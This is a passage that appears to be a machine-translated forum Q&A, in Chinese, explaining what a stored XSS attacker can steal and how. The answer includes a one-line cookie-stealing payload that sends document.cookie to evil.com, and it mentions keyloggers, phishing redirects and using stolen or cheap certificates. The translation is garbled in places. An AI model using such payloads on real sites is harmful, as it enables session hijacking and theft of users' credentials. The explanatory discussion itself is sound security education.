Css Xss跨站点脚本的实践

我知道xss攻击使用页面的输入点将javascript代码插入页面或服务器数据库。 在这两种情况下，javascript代码将很快或稍后在某些事件中激活。 我想象一个攻击者使用浏览器将javascript代码放入服务器数据库，可能使用输入名称。 另一个客户机（受害者）向同一台服务器发出请求，可能会请求用户classific。 攻击者属于classific，因此攻击者名称（实际上是邪恶的javascript代码）被插入到受害者请求的页面中

问题是攻击者可以窃取哪些信息以及如何窃取

我想攻击者想得到饼干。我想他想在他的邪恶脚本中加入一个javascript代码。 通过这种方式，他可以将有关cookies的信息传递给jsp/asp或其他任何信息

所以，如果站点使用https，那么可以包含http服务器中的脚本吗？ 我不相信攻击者使用https服务器来存储脚本，因为它很快就会被轻易逮捕

或者攻击者可以通过其他方式获取信息

我想攻击者想得到饼干。我想他想在他的邪恶脚本中加入一个javascript代码。通过这种方式，他可以将有关cookies的信息传递给jsp/asp或其他任何信息

问题是攻击者可以窃取哪些信息以及如何窃取

是的，最简单的攻击类型是窃取非cookie

新建图像（）.src=https://www.evil.com/?“+escape（document.cookie）；

其他攻击包括注入JavaScript键盘记录器，以类似的方式将击键发送回攻击者，或将用户重定向到钓鱼网站或包含

所以，如果站点使用https，那么可以包含http服务器中的脚本吗？我不相信攻击者使用https服务器来存储脚本，因为它很快就会被轻易逮捕

有趣的问题。是的，使用HTTPS的站点不会降低XSS漏洞的可能性。他们需要在一个支持HTTPS的web服务器上托管攻击页面，并使用受害者机器信任的证书。这可能是攻击者自己的带有where的计算机，也可能是已经受到攻击的计算机（例如，如果攻击者已经控制了另一个公共网站），或者可能是攻击者正在其域上使用的另一个被黑客攻击的站点的被盗证书（与or结合使用）编辑：现在可以从类似的公司获得免费证书

获取域验证证书几乎不需要安全性：

低保证证书仅包括您的域名 证明书证书颁发机构通常会验证您是否拥有 通过检查WHOIS记录获得域名。证书可以是 即时发行，价格便宜，但顾名思义，这些 证书对您的客户提供的保证较少

---

谢谢你的回答！。在您看来，攻击者是否可能使用mailto URI方案发送带有cookies的电子邮件，而不是http Get调用（作为脚本或图像）？？此外，如果攻击者的唯一目的是获取cookies，如果开发人员使用HttpOnly，Xss攻击不再是问题？@Luca:no，

mailto

方案需要用户交互，而GET只发送它。Cookie不是唯一的目标，其他攻击包括注入JavaScript键盘记录器，以类似的方式将击键发送回攻击者，或将用户重定向到钓鱼网站或包含按需下载的网站。@Luca有什么理由将接受的答案勾号替换为向上投票吗？